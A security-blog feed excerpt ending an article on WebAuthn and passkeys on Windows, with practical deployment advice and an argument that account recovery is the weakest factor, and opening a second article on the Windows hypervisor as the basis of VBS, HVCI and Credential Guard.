&lt;p&gt;&lt;strong&gt;Username enumeration and discoverable-credential privacy.&lt;/strong&gt; Discoverable credentials let an authenticator answer &quot;do you have a credential for this &lt;code&gt;rpId&lt;/code&gt;?&quot; without further information. A relying party that asks the question maliciously can enumerate which of its users have set up a passkey. The &lt;code&gt;credProtect&lt;/code&gt; extension introduced in CTAP 2.1 [@ctap-2-1-ps] requires &lt;code&gt;UV=1&lt;/code&gt; to even list the credential, which closes most of the leak; it is not universally deployed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Counter-regression false positives on synced passkeys.&lt;/strong&gt; The per-credential signature counter is per-authenticator. A passkey synced across two devices will see the counter desynchronise between them. WebAuthn L3 §6.1.1 explicitly permits a &lt;em&gt;zero-counter&lt;/em&gt; for synced passkeys; relying parties that treat any counter regression as evidence of cloning will produce false positives. Treat counter regression as evidence of cloning &lt;em&gt;only&lt;/em&gt; for &lt;code&gt;BS=0&lt;/code&gt; (device-bound) credentials. This is a deployment foot-gun, not a protocol flaw.&lt;/p&gt;

flowchart LR
    A[rpId binding / origin in clientDataJSON] --&amp;gt; P[Phishing resistance]
    B[Public-key model / no shared secret] --&amp;gt; V[Verifier-compromise resistance]
    C[Per-RP challenge + signCount + BS=0] --&amp;gt; RR[Replay / relay resistance]
    D[UP and UV flags + freshness] --&amp;gt; S[Step-up / continuity]
    E[BE / BS flags + sync fabric] --&amp;gt; AV[Availability]
    F[Recovery Key + Recovery Contact] --&amp;gt; RC[Recovery]
    G[TPM 2.0 / hardware secure element] --&amp;gt; AAL[AAL3 device-bound]
    H[End-to-end encrypted sync fabric] --&amp;gt; AAL2[AAL2 synced]
&lt;p&gt;These are the &lt;em&gt;protocol&lt;/em&gt; limits. The biggest practical limit is one the protocol cannot fix at all -- recovery. The protocol can specify what factor produces the credential at sign-in; it cannot specify what factor produces the credential when the original one is lost. That is the application-layer question every relying party answers differently, and it is the question §17 will land on.&lt;/p&gt;
&lt;h2&gt;15. Open problems: what&apos;s still moving in late 2025 / early 2026&lt;/h2&gt;
&lt;p&gt;Standardisation is not done. Several major surfaces are still in active draft.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WebAuthn Level 3&lt;/strong&gt; is currently a W3C Candidate Recommendation [@webauthn-l3-cr]; the dated CR snapshot is 13 January 2026 [@webauthn-l3-cr-dated]. The expected progression is Candidate Recommendation to Proposed Recommendation to Recommendation through 2026, with no major spec-breaking changes expected at this point in the process. The active editor masthead is Hodges, J.C. Jones, M.B. Jones, Kumar, and Lundberg [@wiki-webauthn].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CTAP 2.2&lt;/strong&gt; is a FIDO Proposed Standard as of 14 July 2025 [@ctap-2-2-ps]; &lt;strong&gt;CTAP 2.3&lt;/strong&gt; followed as a Proposed Standard on 26 February 2026 [@fido-specs-download]. The 2.2 and 2.3 revisions refine hybrid transport, &lt;code&gt;credProtect&lt;/code&gt;, and PIN-protocol handling without breaking 2.1&apos;s command-byte table.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cross-vendor passkey portability.&lt;/strong&gt; The FIDO Alliance &lt;em&gt;Credential Exchange Protocol&lt;/em&gt; (CXP) and &lt;em&gt;Credential Exchange Format&lt;/em&gt; (CXF) Working Drafts, dated 3 October 2024 [@fido-cxp-wd], are the standards effort. The draft text identifies the problem: &quot;the transfer of credentials between two different providers has traditionally been an infrequent occurrence... As it becomes more common for users to have multiple credential providers that they use to create [and] manage credentials, it becomes important to address some of the security concerns with regard to migration&quot; [@fido-cxp-wd]. Apple has signalled CXP-based import for iOS; Bitwarden has signalled support. The likely 2026 trajectory is CXP becoming a Proposed Standard and Windows / Android / iOS implementing it as the OS-level import-export passkeys surface.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Transactional authorisation.&lt;/strong&gt; The earliest WebAuthn drafts included &lt;code&gt;txAuthSimple&lt;/code&gt; and &lt;code&gt;txAuthGeneric&lt;/code&gt; extensions [@webauthn-fpwd]; neither was ever implemented by browsers, and both are absent from L3. The productised path is Secure Payment Confirmation (a sibling spec to WebAuthn), but it covers only payment transactions. General &quot;sign a description of &lt;em&gt;this transaction&lt;/em&gt;&quot; remains an open problem. Conjecture: payment-confirmation becomes the template that gets generalised in WebAuthn Level 4.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quantum-safe attestation.&lt;/strong&gt; The IANA COSE algorithm registry (last updated 2026-03-04) currently has no PQC algorithm in WebAuthn-recommended status [@iana-cose-registry]. ECDSA P-256, EdDSA Ed25519, RSA-PKCS1.5, and RSA-PSS are the registered options, all quantum-breakable in principle. A long-lived TPM AIK signed today is forgeable to a quantum-capable adversary at any future date. The companion &lt;em&gt;Post-Quantum Cryptography on Windows&lt;/em&gt; article in this series walks the algorithm-side rollout; the WebAuthn deployment side is open. The most plausible trajectory is ML-DSA (FIPS 204) entering the WebAuthn COSE registry by 2027 and existing TPM AIKs receiving a parallel ML-DSA enrolment.&lt;/p&gt;
&lt;p&gt;Standards are still moving. What should a practitioner do &lt;em&gt;today&lt;/em&gt;?&lt;/p&gt;
&lt;h2&gt;16. Practical guide: what to do this week&lt;/h2&gt;
&lt;p&gt;Six pieces of operational advice, each tied to a primary source.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Windows developers: use &lt;code&gt;webauthn.dll&lt;/code&gt;, do not roll your own.&lt;/strong&gt; The Win32 reference at &lt;code&gt;learn.microsoft.com/en-us/windows/win32/api/webauthn/&lt;/code&gt; [@ms-learn-win32-webauthn] is the only surface you should be calling. The OS handles USB-HID, NFC, BLE, hybrid transport, Conditional Mediation, plug-in dispatch, and Windows Hello UV in one call. The header is at &lt;code&gt;github.com/microsoft/webauthn&lt;/code&gt; [@github-ms-webauthn]; the Microsoft Learn overview is at &lt;code&gt;learn.microsoft.com/.../hello-for-business/webauthn-apis&lt;/code&gt; [@ms-learn-webauthn-apis].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Relying parties: default to &lt;code&gt;attestation: &quot;none&quot;&lt;/code&gt;, &lt;code&gt;userVerification: &quot;required&quot;&lt;/code&gt;, &lt;code&gt;residentKey: &quot;preferred&quot;&lt;/code&gt;.&lt;/strong&gt; This is the 2024-2026 consumer-flow baseline. &lt;code&gt;attestation: &quot;none&quot;&lt;/code&gt; preserves user privacy and interoperates with every authenticator type. &lt;code&gt;userVerification: &quot;required&quot;&lt;/code&gt; forces &lt;code&gt;UV=1&lt;/code&gt; and the gesture acquisition. &lt;code&gt;residentKey: &quot;preferred&quot;&lt;/code&gt; enables usernameless sign-in on platforms that support it without burning a credential slot on older authenticators that don&apos;t. The Microsoft Entra passwordless documentation [@ms-entra-passwordless] and the WebAuthn Level 3 spec [@webauthn-l3-cr] are the references.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Enterprise IT: device-bound FIDO2 keys for AAL3 (admin, finance, tier 0); synced passkeys for AAL2 workforce.&lt;/strong&gt; NIST SP 800-63B-4 [@sp80063b4-html] formalises the dichotomy via the syncable-authenticator supplement [@sp80063sup1]. Yubico&apos;s enterprise commentary makes the operational point: device-bound passkeys on dedicated hardware are AAL3; synced passkeys are AAL2 [@yubico-nist-guidance]. For admin accounts use FIDO Alliance L3-certified hardware [@fido-certification-levels] -- YubiKey Bio, Feitian BioPass, the Entra-listed vendors at &lt;code&gt;learn.microsoft.com/.../concept-fido2-hardware-vendor&lt;/code&gt; [@ms-entra-fido2-hardware].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Windows 11 24H2 end users: enable third-party passkey providers in Settings.&lt;/strong&gt; Settings -&amp;gt; Accounts -&amp;gt; Passkeys -&amp;gt; Advanced options. Toggle the provider on for any vendor you trust (1Password, Bitwarden, Dashlane) [@ms-windev-passkeys-blog]. The Microsoft Learn third-party tutorial walks the flow [@ms-learn-thirdparty]. If you do not use a third-party vault, the Microsoft synced passkey provider is enabled by default on 24H2 systems signed in with a Microsoft Account.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. Security architects: write down your recovery flow first.&lt;/strong&gt; Score it against the five-axis criteria table from §2 before you design the authentication factors. The recovery row&apos;s strength is the system&apos;s ceiling, not the floor; the authentication ceremony cannot raise it. Microsoft Entra&apos;s own guidance flags account recovery as a deployment risk: FIDO2 keys &quot;can increase costs for equipment, training, and helpdesk support -- especially when users lose their physical keys and need account recovery&quot; [@ms-entra-passwordless]. §17 lands this argument.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. Incident responders: collect ETW events from the WebAuthn provider.&lt;/strong&gt; Plug-in authenticator registration events on managed devices are a high-signal indicator -- a newly enrolled &lt;code&gt;IPluginAuthenticator&lt;/code&gt; on a privileged user&apos;s machine should be treated as a credential-store change requiring review. The companion &lt;em&gt;ETW on Windows&lt;/em&gt; article in this series walks the WebAuthn provider events end to end.&lt;/p&gt;

Open PowerShell as the signed-in user (no admin needed for your own credentials) and call into the `webauthn.dll` `WebAuthNGetPlatformCredentialList` API via a managed wrapper, or use the Settings -&amp;gt; Accounts -&amp;gt; Passkeys page directly. There is no first-class `Get-WebAuthnCredential` cmdlet as of Windows 11 25H2; the Settings page is the supported management surface. The Microsoft Learn passkey overview is the canonical reference [@ms-learn-passkeys].
&lt;p&gt;Most of this is engineering. One row of the table has resisted engineering for fifty years. That&apos;s where the article lands.&lt;/p&gt;
&lt;h2&gt;17. Recovery: your weakest factor is always your recovery flow&lt;/h2&gt;
&lt;p&gt;The thesis surfaced in §2 and deferred through twelve sections is the one the article lands on. The argument is direct, almost embarrassingly so: every authentication system that admits any external recovery primitive is, in the formal sense, at most as strong as that primitive. Strong authentication ceremonies coexist with weaker recovery ceremonies in every consumer platform in production, and the &lt;em&gt;system&apos;s&lt;/em&gt; assurance level is the minimum of the two, not the maximum.&lt;/p&gt;

*Your weakest factor is always your recovery flow.*
&lt;p&gt;To make the claim concrete, score every major platform&apos;s recovery flow against the same five-axis criteria table.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Apple iCloud Keychain (with Advanced Data Protection).&lt;/strong&gt; Apple&apos;s published model has three recovery primitives [@apple-adp-kb]: (a) a &lt;em&gt;trusted device&lt;/em&gt; the user previously signed into; (b) an &lt;em&gt;iCloud Recovery Contact&lt;/em&gt; -- another Apple ID owner the user has nominated to attest their identity; and (c) an &lt;em&gt;iCloud Recovery Key&lt;/em&gt; -- a 28-character string the user must retain [@apple-recovery-key]. Apple&apos;s published architecture is the strongest current consumer realisation of the end-to-end-encrypted invariant: the recovery primitives unlock an HSM-backed escrow cluster that holds the user&apos;s iCloud Keychain encryption material, but Apple itself does not hold the keys in plaintext. The fundamental dependency is the Apple ID password plus, originally, SMS-OTP at device-trust establishment.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Google Password Manager (with Google Account end-to-end encrypted passkey sync).&lt;/strong&gt; Trusted-device fallback, security-key fallback, recovery code, recovery phone, recovery email. The recovery floor reduces, in the worst case, to SMS-OTP via the recovery phone. Google&apos;s architecture is end-to-end encrypted in the steady state but the trust establishment depends on Google account recovery, which depends on out-of-band verification primitives the user enrolled at account creation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Account.&lt;/strong&gt; The October 2024 Windows Developer Blog states the recovery primitive verbatim: &quot;you will be prompted to save a recovery key that will be used to verify your identity and protect your passkeys through end-to-end encryption&quot; [@ms-windev-passkeys-blog]. The recovery key is a high-entropy string the user retains; if they lose it, the recovery flow falls back to the secondary factors the user enrolled (alternate email or SMS-OTP via the recovery phone). As with Google, the worst-case recovery floor is the weakest of the secondary factors the user enrolled.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Entra ID (enterprise).&lt;/strong&gt; Entra&apos;s Temporary Access Pass (TAP) is the strongest enterprise recovery primitive currently shipped: an administrator issues a time-bound passwordless TAP that the user redeems to bootstrap a new authenticator. TAP is stronger than consumer flows because of &lt;em&gt;accountability&lt;/em&gt; -- the admin&apos;s identity is on the issuance -- but weaker than the authentication ceremony itself because the admin is socially engineerable. Microsoft documents the TAP issuance and redemption flow in detail [@ms-entra-tap].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1Password, Bitwarden, Dashlane under the 24H2 plug-in model.&lt;/strong&gt; Each vendor&apos;s master password and secondary recovery primitive becomes the &lt;em&gt;de facto&lt;/em&gt; floor of the entire passkey ceremony when the plug-in is the credential store. 1Password&apos;s master password plus Secret Key, Bitwarden&apos;s master password plus 2FA recovery code, and Dashlane&apos;s device trust plus master password -- each is the recovery floor for every passkey the vault holds. The Microsoft Learn third-party tutorial reinforces the warning, in context: &quot;Contoso Passkey Manager is designed for passkey creation and usage testing only. Don&apos;t use the app for production passkeys&quot; [@ms-learn-thirdparty].&lt;/p&gt;

flowchart TD
    A[Apple iCloud Keychain ADP] --&amp;gt; A1[Recovery Contact]
    A --&amp;gt; A2[Recovery Key 28 chars]
    A --&amp;gt; A3[Trusted device]
    A3 --&amp;gt; A4[Apple ID password + SMS-OTP at trust establishment]
    B[Google Password Manager] --&amp;gt; B1[Recovery code]
    B --&amp;gt; B2[Recovery phone]
    B --&amp;gt; B3[Recovery email]
    B2 --&amp;gt; B4[SMS-OTP]
    C[Microsoft Account] --&amp;gt; C1[Recovery Key]
    C --&amp;gt; C3[Alternate email]
    C --&amp;gt; C4[Recovery phone -&amp;gt; SMS-OTP]
    D[Entra ID enterprise] --&amp;gt; D1[Temporary Access Pass]
    D1 --&amp;gt; D2[Admin: socially engineerable]
    E[1Password / Bitwarden / Dashlane vault] --&amp;gt; E1[Master password + Secret Key / 2FA recovery code]
    A4 --&amp;gt; Z[Weak shared-knowledge or SMS-OTP floor]
    B4 --&amp;gt; Z
    C4 --&amp;gt; Z
    D2 --&amp;gt; Z
    E1 --&amp;gt; Z
&lt;p&gt;The diagram looks busy because it is. Every major platform&apos;s recovery flow is a different combination of trusted-device fallback, recovery code or key, recovery contact, and an out-of-band primitive (SMS-OTP, email, or admin attestation). Every one of those out-of-band primitives is weaker than origin-bound public-key cryptography. The cryptographic ceremony scores AAL3 phishing-resistant at the authentication moment; the recovery primitive scores AAL1 or AAL2 at the recovery moment. &lt;em&gt;The system&apos;s AAL is the minimum.&lt;/em&gt;&lt;/p&gt;

NIST SP 800-63B-4&apos;s AAL2 / AAL3 split makes the recovery story explicit. Section 5.1 of SP 800-63B-4 enumerates permitted recovery primitives; every one is at most as strong as its underlying factor. The April 2024 supplement [@sp80063sup1] caps synced passkeys at AAL2 because the long-term private key has left the original authenticator -- the same logic that caps the recovery row applies to the sync fabric. Auditors who care about AAL3 for tier-zero accounts will require *both* a device-bound authenticator and a documented recovery flow whose own strength is at AAL3. The current best-practice composition is two device-bound hardware authenticators in different physical locations, each registered as primary for the other&apos;s recovery.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every passkey platform in production in 2026 -- Apple, Google, Microsoft, Entra, 1Password, Dashlane, Bitwarden -- bottoms out, in its recovery flow, in some combination of trusted-device fallback and SMS-OTP-equivalent shared knowledge. That floor is the AAL ceiling for the entire system.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The protocol literature has been clear about this for fifty years and the regulatory literature has been catching up since 2017. NIST SP 800-63-3 introduced &quot;phishing-resistant authenticator&quot; as a first-class term; SP 800-63-4 (2025) [@sp80063-4-final] makes verifier-impersonation resistance a normative criterion. Neither standard solves recovery; both standards explicitly enumerate what counts as a recovery primitive without specifying how to &lt;em&gt;compose&lt;/em&gt; them into an AAL-graded flow. There is no IETF or FIDO Alliance standard that says &quot;here is a recovery flow whose strength is AAL3.&quot; There may never be -- recovery is application-specific, and the only general protocol is &quot;social attestation&quot; (multiple human witnesses), which does not scale.&lt;/p&gt;
&lt;p&gt;The same WebAuthn ceremony that scores AAL3 phishing-resistant at the authentication moment can be a single-factor SMS-OTP at the recovery moment. &lt;em&gt;Your weakest factor is always your recovery flow.&lt;/em&gt; That is the line. It is the line every working security architect should write down, score against, and design recovery against -- &lt;em&gt;before&lt;/em&gt; designing the authentication factors.&lt;/p&gt;
&lt;h2&gt;18. FAQ&lt;/h2&gt;

No. A password is a shared secret -- the user types a string, the server stores a hash of the same string, and an eavesdropper who captures the string in flight or compromises the server&apos;s database has a credential they can replay. A passkey is one half of an asymmetric keypair: the private key lives in the authenticator (TPM, secure enclave, hardware key, or end-to-end-encrypted sync fabric), and only its public key reaches the server. An eavesdropper who captures a passkey ceremony in flight has nothing they can replay; a server-database leak yields public keys that authenticate no one. WebAuthn Level 3 [@webauthn-l3-cr] and the Microsoft Entra &quot;origin-bound public key cryptography&quot; framing [@ms-entra-passwordless] are the references.

Insecure relative to device-bound; secure relative to passwords. The NIST syncable-authenticator supplement (April 2024) [@sp80063sup1] and SP 800-63B-4 (July 2025) [@sp80063b4-html] cap synced passkeys at AAL2, because the long-term private key has left the original authenticator. Device-bound passkeys on dedicated hardware -- &quot;FIDO passkeys that are not synced ... and are properly stored in dedicated hardware have an AAL3 rating&quot; [@yubico-nist-guidance] -- can reach AAL3. The right answer is to use device-bound keys for tier-zero accounts and synced passkeys for the bulk of consumer flows.

Hello *uses* biometrics but provides the *user-verification gesture* for WebAuthn; the credential itself is asymmetric and lives in the TPM. Microsoft Learn states the property verbatim: &quot;The private keys can only be used after they&apos;re unlocked by the user using the Windows Hello unlock factor (biometrics or PIN)&quot; [@ms-learn-passkeys]. The biometric is one mode of the Hello UV gesture, not the credential. If you disable face or fingerprint, your PIN still unlocks the passkey.

No. Attestation is privacy-leaking for synced passkeys; `attestation: &quot;none&quot;` is the 2024-2026 default for consumer flows. Use `attestation: &quot;direct&quot;` only when you have a documented anti-fraud requirement and can verify the chain against the FIDO Metadata Service. Use `attestation: &quot;enterprise&quot;` only inside a managed enterprise where the user&apos;s device is corporately enrolled. The relevant references are WebAuthn Level 2 §§8.2-8.8 [@webauthn-l2-latest] and the IANA WebAuthn registry [@iana-webauthn-registry].

No. The cryptographic binding is the QR-code-encoded ephemeral ECDH key. Bluetooth is a transport and a proximity signal; it is not a trust anchor. The QR code transfers the laptop&apos;s ephemeral public key plus a derived HMAC seed; the phone derives the shared secret via ECDH; the BLE advertisement merely proves the phone is physically close to the laptop. The encrypted CTAP2 ceremony bytes travel over HTTPS through a discoverable tunnel relay. WebAuthn Level 3 §6.3.3 is the normative description [@webauthn-l3-cr].

No. A Windows passkey can be used with PIN-only user verification; the biometric is one mode of the Hello UV gesture, not the credential. The credential is in the TPM, indexed under your Microsoft Account container, and the PIN is one valid unlock factor. If you use a third-party passkey provider via the 24H2 plug-in model, that provider may use its own master password as the UV gesture; the OS still mediates the gesture acquisition through `WebAuthNPluginPerformUserVerification` [@ms-learn-webauthn-apis].

Microsoft cannot see your TPM-sealed Windows Hello private key; the TPM does not expose the raw key material to the OS, let alone to Microsoft. Apple&apos;s iCloud Keychain with Advanced Data Protection [@apple-adp-kb] and Google&apos;s end-to-end-encrypted passkey sync mean the sync provider cannot see the plaintext keys either. *But* the recovery path can still expose them under specific conditions: an attacker who compromises your recovery contact, recovery key, or your account&apos;s out-of-band recovery primitives (SMS-OTP, recovery email) effectively defeats the end-to-end encryption invariant. The plaintext keys are not what gets exfiltrated; the recovery primitives are.
&lt;p&gt;This article is one of a series on Windows authentication primitives. &lt;em&gt;NTLMless: The Death of NTLM in Windows&lt;/em&gt; (2026-05-10) covers the legacy authentication protocol passkeys are displacing. &lt;em&gt;Windows Hello, Demystified&lt;/em&gt; covers the user-verification gesture WebAuthn leans on. &lt;em&gt;Adminless: Administrator Protection in Windows&lt;/em&gt; (2026-05-10) and &lt;em&gt;App Identity in Windows&lt;/em&gt; (2026-05-08) cover the privilege-escalation and code-identity primitives that surround the authentication stack. The companion &lt;em&gt;Kerberos on Windows&lt;/em&gt; (2026-05-11) covers the enterprise transport for the resulting assertions; &lt;em&gt;ETW on Windows&lt;/em&gt; (2026-05-11) covers the telemetry surface for incident responders.&lt;/p&gt;
&lt;p&gt;The Windows passkey stack is the productisation moment for a forty-year-old protocol-literature insight: authentication should be tied to &lt;em&gt;something the network attacker cannot change&lt;/em&gt;. WebAuthn ties it to the origin in &lt;code&gt;clientDataJSON&lt;/code&gt;, signed by a credential whose private key never reaches the wire. Windows 10 1903 made it a Win32 surface; Windows 11 24H2 made it a plug-in surface; Authenticate 2024 made it a default. The protocol bytes are FIDO2; the consumer experience is autofill. The Windows part is the dispatcher between them.&lt;/p&gt;
&lt;p&gt;The criteria framework is the diagnostic kit. Use it on every authentication system you ship. Score it against five axes, not three. Write down the recovery flow first. Match the authentication ceremony to the recovery flow you can actually defend. And remember the line: &lt;em&gt;your weakest factor is always your recovery flow.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;webauthn-and-passkeys-on-windows-from-ctap-to-the-credential-provider-model&quot; keyTerms={[
  { term: &quot;Phishing-resistant authenticator&quot;, definition: &quot;An authenticator whose protocol prevents a relying party impersonator from inducing the authenticator to release a usable credential value. NIST SP 800-63B-4 calls this verifier-impersonation resistance.&quot; },
  { term: &quot;Origin binding&quot;, definition: &quot;The mechanism by which WebAuthn enforces phishing resistance: the browser writes the origin into clientDataJSON; the authenticator signs over the SHA-256 hash of the canonical rpId; the RP rejects any signature whose rpIdHash does not match the registered rpId.&quot; },
  { term: &quot;rpId&quot;, definition: &quot;A string identifying the WebAuthn relying party for credential scoping. Must be a registrable suffix of the page&apos;s origin. All WebAuthn signatures are made over its SHA-256 hash.&quot; },
  { term: &quot;CTAP 2.x&quot;, definition: &quot;The Client-to-Authenticator Protocol: the wire format browser to roaming authenticator over USB-HID, NFC, or BLE. CTAP1 is APDU-based; CTAP2 is CBOR-based. Modern keys speak CTAP 2.1 (June 2021) or 2.2 (July 2025).&quot; },
  { term: &quot;Discoverable credential (resident key, passkey)&quot;, definition: &quot;A WebAuthn credential whose account metadata is stored on the authenticator, enabling usernameless sign-in. CTAP 2.0 called these resident keys; the May 2022 vendor commitment branded them passkeys.&quot; },
  { term: &quot;Attestation conveyance&quot;, definition: &quot;The mechanism by which a registration ceremony optionally produces a signature over the credential public key, chained to a vendor or platform root. Seven IANA-registered formats: packed, tpm, android-key, android-safetynet, fido-u2f, apple, none.&quot; },
  { term: &quot;Hybrid transport (caBLE)&quot;, definition: &quot;A WebAuthn transport in which a phone acts as a roaming authenticator for a nearby laptop. QR code carries an ephemeral ECDH key; BLE proves proximity; HTTPS tunnel relay carries encrypted CTAP2 bytes.&quot; },
  { term: &quot;AAGUID&quot;, definition: &quot;A 16-byte Authenticator Attestation GUID identifying the authenticator make and model. Some authenticators emit all-zeros for privacy; the FIDO Metadata Service is the authoritative directory.&quot; },
  { term: &quot;Conditional UI / Conditional Mediation&quot;, definition: &quot;A WebAuthn invocation mode in which the browser offers discoverable credentials inside the autofill UI rather than via a modal picker. RP calls navigator.credentials.get with mediation: &apos;conditional&apos;.&quot; },
  { term: &quot;BE / BS flags&quot;, definition: &quot;Backup Eligible and Backup State bits in authenticatorData. BE=1 means the credential is in principle syncable; BS=1 means it is currently backed up. NIST SP 800-63B-4 caps BS=1 credentials at AAL2.&quot; },
  { term: &quot;AAL1 / AAL2 / AAL3&quot;, definition: &quot;NIST SP 800-63B-4 authentication assurance levels. AAL1 is single-factor; AAL2 is multi-factor or phishing-resistant; AAL3 is hardware-bound non-syncable authentication.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>webauthn</category><category>passkeys</category><category>fido2</category><category>ctap</category><category>phishing-resistance</category><category>windows-hello</category><category>authentication</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Above Ring Zero: How the Windows Hypervisor Became a Security Primitive</title><link>https://paragmali.com/blog/above-ring-zero-how-the-windows-hypervisor-became-a-security/</link><guid isPermaLink="true">https://paragmali.com/blog/above-ring-zero-how-the-windows-hypervisor-became-a-security/</guid><description>A deep tour of the Windows hypervisor as the substrate of VBS, HVCI, Credential Guard, and Secure Launch -- its five primitives, the boundary it commits to, and the public failures that calibrate it.</description><pubDate>Sun, 10 May 2026 00:00:00 GMT</pubDate><content:encoded>
**The Windows hypervisor is the program that loaded before Windows did.** It runs at a privilege level the Windows kernel cannot reach and owns the page tables that decide which memory the Windows kernel may even see. Virtualization-Based Security, Credential Guard, HVCI (Memory Integrity in Windows Security), Application Control, VBS Enclaves, and System Guard Secure Launch are all built by composing five primitives the hypervisor exposes -- partitions, hypercalls, intercepts, SynIC, and per-VTL SLAT. The substrate is real, alive, and producing two to four public CVEs per year; the residual attack surface (firmware below, side channels above, IOMMU bypass beside, hypervisor rollback) is where Windows security still earns its hardest miles.
&lt;h2&gt;1. Above Ring Zero&lt;/h2&gt;
&lt;p&gt;On a Windows 11 machine with VBS turned on, a kernel-mode driver running with full Ring-0 privilege cannot read a single byte of the LSASS process&apos;s credential cache. It cannot load an unsigned driver. It cannot patch &lt;code&gt;ntoskrnl.exe&lt;/code&gt;. It cannot disable HVCI without a reboot. None of this is enforced by Windows. It is enforced by a different program -- one that loaded before Windows did, that runs at a privilege level the Windows kernel cannot reach, and that owns the page tables that say which memory the Windows kernel may even &lt;em&gt;see&lt;/em&gt;. That program is the Windows hypervisor [@ms-hyperv-architecture, @ms-tlfs-vsm].&lt;/p&gt;
&lt;p&gt;The intuition this fact violates is older than most readers&apos; careers. &quot;SYSTEM owns the box.&quot; Every introductory security course teaches it. Local administrator escalates to SYSTEM, SYSTEM loads a driver, the driver runs in the kernel, and the kernel can do anything to the machine. That model is correct for a Windows installation running without Virtualization-Based Security. It is wrong, in three specific and load-bearing ways, for a Windows installation that has VBS turned on.&lt;/p&gt;

A Windows security architecture that uses the Hyper-V hypervisor to create a small, isolated execution environment alongside the normal Windows operating system. The hypervisor allocates a portion of memory, configures its second-level page tables to make that memory unreadable and unwritable from normal kernel mode, and runs Microsoft-signed code there -- the Secure Kernel and isolated user-mode trustlets -- that the regular NT kernel cannot reach. Credential Guard, HVCI, Application Control, and System Guard all sit on top of this primitive [@ms-tlfs-vsm].
&lt;p&gt;The binary in question is named &lt;code&gt;hvix64.exe&lt;/code&gt; on Intel hosts and &lt;code&gt;hvax64.exe&lt;/code&gt; on AMD hosts.Loose security writing sometimes calls the hypervisor&apos;s privilege level &quot;Ring -1.&quot; That phrase is colloquial. Intel&apos;s manuals say &quot;VMX root operation&quot;; AMD&apos;s manuals say &quot;SVM host mode.&quot; Both terms denote a CPU operating mode that sits architecturally outside the four-ring privilege stack the guest OS sees, not a fifth ring inside it. It is loaded by &lt;code&gt;hvloader.efi&lt;/code&gt; before &lt;code&gt;winload.exe&lt;/code&gt; ever runs. By the time the Windows boot manager hands control to the NT kernel, the hypervisor has already configured the CPU&apos;s virtualization extensions, allocated its own private memory, taken ownership of the IOMMU, and set up the per-partition second-level page tables that decide which physical pages each partition can see [@ms-tlfs-pdf]. From the NT kernel&apos;s point of view, the machine starts up already inside a guest partition. There is no escape upward.&lt;/p&gt;
&lt;p&gt;This article is about the program that loaded first. The siblings in this series -- on the &lt;a href=&quot;https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Secure Kernel&lt;/a&gt;, on &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;Credential Guard and NTLMless&lt;/a&gt;, on &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt;, and on &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Adminless&lt;/a&gt; -- all assume what this article explains. Each of them describes a policy: the Secure Kernel enforces code integrity; Credential Guard isolates LSASS; Adminless raises the bar on local administrator. None of those policies would be enforceable without a piece of software running at a privilege level the policy&apos;s adversary cannot reach. The hypervisor is that piece of software, and &quot;security primitive&quot; is how Microsoft, the security research community, and the bug-bounty market all describe its current role.&lt;/p&gt;
&lt;p&gt;By the end of this article you will know five things. First, &lt;em&gt;why&lt;/em&gt; the hypervisor became a security primitive -- the architectural failure of Ring-0 defenses that Microsoft fought for a decade and finally gave up on in 2015. Second, &lt;em&gt;how&lt;/em&gt; it became one, in three steps: Popek and Goldberg&apos;s 1974 virtualizability theorem; Intel VT-x and AMD-V in 2005-2006; and David Hepkin and Arun Kishan&apos;s 2013 patent on hierarchical Virtual Trust Levels [@us9430642b2-patent]. Third, &lt;em&gt;what&lt;/em&gt; it enforces, feature by feature, with the hypervisor primitive that backs each: HVCI rides on per-VTL SLAT; Credential Guard rides on SynIC plus the secure-call ABI; System Guard Secure Launch rides on DRTM [@ms-system-guard-secure-launch]. Fourth, &lt;em&gt;where&lt;/em&gt; it has actually failed in public -- six worked CVEs across three distinct attack classes, all narrowly localized. Fifth, &lt;em&gt;what&lt;/em&gt; is structurally outside its mandate: firmware below the hypervisor, microarchitectural side channels above it, IOMMU bypass beside it, and hypervisor rollback through the update pipeline.&lt;/p&gt;
&lt;p&gt;The story is half engineering and half conceptual inversion. How did a server-consolidation hypervisor that shipped in 2008 with &lt;code&gt;Windows Server 2008&lt;/code&gt; -- a product whose original marketing pitch was &quot;run more VMs per box&quot; -- become the architectural substrate that protects every load-bearing Windows security boundary in 2026? The answer begins in 1974, with a paper that defined what a hypervisor even &lt;em&gt;is&lt;/em&gt;. But the political and engineering thread begins five years before that, in San Mateo, California.&lt;/p&gt;
&lt;h2&gt;2. Origins -- Connectix to Viridian to Hyper-V&lt;/h2&gt;
